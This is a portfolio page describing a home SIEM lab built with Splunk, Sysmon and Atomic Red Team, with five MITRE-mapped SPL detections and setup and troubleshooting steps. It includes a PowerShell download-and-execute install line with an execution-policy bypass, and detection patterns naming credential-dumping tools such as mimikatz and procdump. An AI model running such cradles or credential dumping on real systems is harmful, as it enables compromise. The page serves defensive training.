SOC ANALYST HOME LAB — TIER 1

HOME SIEM LAB

Splunk Sysmon Atomic Red Team MITRE ATT&CK

WINDOWS 10 VIRTUALBOX SPLUNK 10.2.2 SYSMON V15 5 DETECTIONS FREE TOOLS
49 THREATS DETECTED
5 MITRE TECHNIQUES
6 DASHBOARD PANELS
12h BUILD TIME
SCROLL

// 01 — PROJECT OVERVIEW

What is this lab?

A fully functional home SIEM environment that simulates a corporate blue team setup — built entirely with free tools on a single machine. Designed to develop real SOC analyst skills through hands-on attack simulation and detection engineering.

🖥️
HOST MACHINE
Splunk Enterprise
SIEM brain — receives, indexes and searches all logs. Free tier handles 500MB/day — more than enough for a home lab.
💻
VIRTUAL MACHINE
Windows 10 VM
Isolated victim endpoint running in VirtualBox. Generates real security logs while keeping your host machine safe.
👁️
LOG AGENT
Sysmon v15
Deep telemetry engine — captures every process, network connection, file creation, and registry change with SwiftOnSecurity config.
📡
LOG SHIPPER
Universal Forwarder
Lightweight agent that collects logs from the VM and ships them to Splunk on port 9997. Must run as SYSTEM for Sysmon access.
⚔️
ATTACK SIMULATOR
Atomic Red Team
Library of real MITRE ATT&CK technique simulations. One command generates authentic attack telemetry without guesswork.
🔍
DETECTION ENGINE
Custom SPL Queries
Hand-written Splunk search queries that detect brute force, PowerShell abuse, credential dumping, and more.

// 02 — BUILD GUIDE

Four phases to a working SIEM

Click each phase to expand the full build steps. Follow in order — each phase depends on the previous one being complete.

P1 Environment Setup — VirtualBox + Windows 10 VM ✓ COMPLETE
virtualbox setup
# Install VirtualBox + Extension Pack from virtualbox.org
# Download Windows 10 Enterprise ISO from microsoft.com/evalcenter
# Create VM: Name=Windows10-Victim, RAM=4096MB, Disk=60GB
# Install Windows — use "Domain join" to skip Microsoft account
01Download VirtualBox (Windows hosts) + Extension Pack from virtualbox.org — install both
02Download Windows 10 Enterprise ISO (90-day eval) from microsoft.com/en-us/evalcenter
03Create VM: Name=Windows10-Victim, Type=Windows 10 64-bit, RAM=4096MB, Disk=60GB
04Tick Skip Unattended Installation — Start VM → install Windows → use "Domain join instead" for local account
05Install Guest Additions: Devices → Insert Guest Additions CD → run VBoxWindowsAdditions.exe → Reboot
06Take a snapshot: Machine → Take Snapshot → Name: Clean-Install
💡 If Windows installer says "No driver found" — go to VM Settings → Storage → change controller from NVMe to SATA (AHCI)
P2 Log Ingestion Pipeline — Splunk + Sysmon + Forwarder ✓ COMPLETE
inputs.conf — C:\Program Files\SplunkUniversalForwarder\etc\system\local\
[WinEventLog://Security] disabled = 0 index = windows renderXml = false
[WinEventLog://Microsoft-Windows-Sysmon/Operational] disabled = 0 index = sysmon renderXml = false
01Install Splunk Enterprise on host PC → open http://localhost:8000
02Settings → Forwarding and Receiving → Configure Receiving → New Receiving Port: 9997
03Settings → Indexes → create index windows and index sysmon
04Run ipconfig on host PC → note the VirtualBox Host-Only Network IPv4 address
05Inside VM: install Splunk Universal Forwarder → Receiving Indexer = your host IP, port 9997
06Open Notepad as Administrator → create inputs.conf at the path shown above
07Install Sysmon: sysmon64.exe -accepteula -i sysmonconfig-export.xml (use SwiftOnSecurity config)
08Critical: services.msc → SplunkForwarder → Properties → Log On → Local System account → Restart
⚠️ The Local System account step is critical. Without it, the Forwarder cannot read Sysmon's protected log channel and index=sysmon will always be empty.
P3 Attack Simulation & Detection — Atomic Red Team + SPL ✓ COMPLETE
PowerShell (Admin) — Atomic Red Team Install
# Step 1: Allow scripts Set-ExecutionPolicy Bypass -Scope CurrentUser -Force
# Step 2: Fix NuGet [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force Install-Module -Name powershell-yaml -Force -AllowClobber
# Step 3: Install IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing) Install-AtomicRedTeam -getAtomics -Force
# Step 4: Import (every session) Import-Module "C:\AtomicRedTeam\invoke-atomicredteam\Invoke-AtomicRedTeam.psd1" -Force

See the Detections section below for all 5 SPL queries and what they catch.

P4 SOC Dashboard — 6 Panel Real-Time Monitoring View ✓ COMPLETE
01Splunk → Dashboards → Create New Dashboard → Title: SOC Detection Lab → Classic Dashboard
02Panel 1 — Single Value: total threat events (EventCode 4625, 4720, 4732, mimikatz/lsass/net user commands)
03Panel 2 — Bar Chart: top targeted accounts (EventCode 4625 grouped by Account_Name)
04Panel 3 — Line Chart: suspicious PowerShell activity over time (timechart span=1h)
05Panel 4 — Table: backdoor account activity (EventCode 4720 + 4732 with human-readable action labels)
06Panel 5 — Table: credential dumping attempts (CommandLine containing lsass/mimikatz/procdump)
07Panel 6 — Area Chart: overall attack timeline (all threat events, timechart span=30m)
The area chart timeline is the most powerful visual — a flat baseline with sudden spikes shows attack activity at a glance. That's what the dashboard produced in this lab.

// 03 — DETECTION RULES

5 MITRE ATT&CK detections

Each detection simulated with Atomic Red Team, caught with a custom SPL query, and verified with real log output in Splunk.

T1087.001 — DISCOVERY
Account Discovery
POST-EXPLOITATION RECON
Detects classic post-compromise reconnaissance — whoami, net user, and net localgroup executed from PowerShell. 3 events caught within seconds of simulation.
index=sysmon EventCode=1 | search CommandLine="*net user*" OR CommandLine="*whoami*" OR CommandLine="*net localgroup*" | table _time, host, User, CommandLine, ParentCommandLine | sort - _time
MEDIUM
T1110.001 — CREDENTIAL ACCESS
Brute Force Attack
PASSWORD GUESSING
Detects repeated failed logins against local accounts. Field names in Splunk differ from raw Windows logs — use Account_Name and Logon_Type, not user and LogonType.
index=windows EventCode=4625 | stats count by Source_Network_Address, Account_Name, host, Logon_Type | where count > 3 | sort - count
HIGH
T1059.001 — EXECUTION
Suspicious PowerShell
LIVING OFF THE LAND
Catches 8 malicious PowerShell patterns including Invoke-Mimikatz download cradle, encoded commands, execution policy bypasses, and offensive toolkit enumeration.
index=sysmon EventCode=1 Image="*powershell.exe*" | eval suspicious=if(match( CommandLine, "(?i)(-enc|-EncodedCommand| -ExecutionPolicy Bypass|IEX| DownloadString|WebClient)"), "YES","NO") | where suspicious="YES" | table _time, host, CommandLine
CRITICAL
T1136.001 — PERSISTENCE
Backdoor Admin Account
LOCAL ACCOUNT CREATION
Caught 4 backdoor admin accounts created in 46 seconds. Correlates EventCode 4720 (account created) with 4732 (added to Administrators) — the classic attacker persistence pattern.
index=windows (EventCode=4720 OR EventCode=4732) | eval action=case( EventCode=4720, "New Account Created", EventCode=4732, "Added to Administrators") | table _time, host, Account_Name, action, src_user | sort - _time
CRITICAL
T1003.001 — CREDENTIAL ACCESS
Credential Dumping
LSASS MEMORY DUMP
17 events caught: Mimikatz direct execution, Invoke-Mimikatz in-memory, ProcDump LSASS dump, comsvcs.dll LOLBin, and xordump. EventCode 1 (process create) instead of EventCode 10 due to Sysmon config.
index=sysmon EventCode=1 | search CommandLine="*lsass*" OR CommandLine="*mimikatz*" OR CommandLine="*sekurlsa*" OR CommandLine="*procdump*" | table _time, host, User, CommandLine | sort - _time
CRITICAL

// 04 — REFERENCE

Key Windows Event IDs

The most important Event IDs every SOC analyst should memorise. Sourced from both Windows Security log and Sysmon.

EVENT ID LOG SOURCE MEANING WHY IT MATTERS
4624SecuritySuccessful logonBaseline — track normal login patterns, spot off-hours access
4625SecurityFailed logonBrute force detection — high count in short window = attack
4648SecurityLogon with explicit credentialsPass-the-hash, lateral movement indicator
4672SecuritySpecial privileges assignedAdmin logon — alert on unexpected accounts
4720SecurityUser account createdBackdoor account creation — always investigate
4732SecurityUser added to security groupPrivilege escalation — especially Administrators group
4776SecurityNTLM credential validationCredential attacks — watch for failures and off-network sources
1SysmonProcess createdEverything that launches — core detection source for all attacks
3SysmonNetwork connection madeC2 beaconing, data exfiltration, lateral movement
10SysmonProcess accessed another processLSASS access = credential dumping attempt
11SysmonFile createdMalware dropping files, ransomware encryption activity
13SysmonRegistry value setPersistence mechanisms — run keys, service installs

// 05 — MITRE ATT&CK

Technique coverage

All 5 detections mapped to the MITRE ATT&CK Enterprise framework — the industry standard for categorising adversary behaviour.

T1087.001
Account Discovery: Local Account
Tactic: Discovery
► Sysmon EID 1
T1110.001
Brute Force: Password Guessing
Tactic: Credential Access
► Windows Security EID 4625
T1059.001
Command & Scripting: PowerShell
Tactic: Execution
► Sysmon EID 1
T1136.001
Create Account: Local Account
Tactic: Persistence
► Windows Security EID 4720+4732
T1003.001
OS Cred Dumping: LSASS Memory
Tactic: Credential Access
► Sysmon EID 1 / 10

// 06 — TROUBLESHOOTING

When things break

Every issue encountered during this lab build, with exact fixes. If you hit something not listed here, open a GitHub issue.

PROBLEM CAUSE FIX
No driver found during Windows install
VirtualBox using NVMe storage controller which Windows installer doesn't have drivers for
Settings → Storage → remove NVMe controller → add AHCI (SATA) controller → re-attach VDI and ISO
index=windows returns no results
The "windows" index was never created in Splunk — events arrive and get dropped
Settings → Indexes → New Index → name: windows → Save. Check Messages for "dropped events" errors.
index=sysmon returns no results
SplunkForwarder running as a limited service account — cannot read Sysmon's protected log channel
services.msc → SplunkForwarder → Properties → Log On tab → Local System account → Apply → Restart
Splunk not loading on port 8000
SplunkD service stopped (common after PC restart)
services.msc → SplunkD → Start. Or: cmd as admin → cd "C:\Program Files\Splunk\bin" → splunk start
Forwarder not shipping logs
inputs.conf saved as .txt instead of no extension, or saved without admin rights
Open Notepad as Administrator → File → Save As → navigate to path → File type: All Files → filename: inputs.conf
Atomic Red Team install fails with powershell-yaml error
NuGet package provider not configured — PSGallery can't resolve the module
Install-PackageProvider -Name NuGet -Force, then Install-Module powershell-yaml -Force -AllowClobber
T1087 atomic test shows "yaml does not exist"
Atomics folder didn't download correctly during initial install
Install-AtomicRedTeam -getAtomics -Force -InstallPath "C:\AtomicRedTeam"
VM window too small / mouse gets stuck
VirtualBox Guest Additions not installed
Devices → Insert Guest Additions CD Image → run VBoxWindowsAdditions.exe inside VM → Reboot
FK
Feroz Khan
SOC ANALYST IN TRAINING — CYBERSECURITY

Building practical cybersecurity skills through hands-on home lab projects.

⌥ GitHub ◈ LinkedIn ▶ TryHackMe

LICENSE
MIT
FRAMEWORK
MITRE ATT&CK Enterprise
COMPLETED
April 2026
TOOLS
All Free & Open Source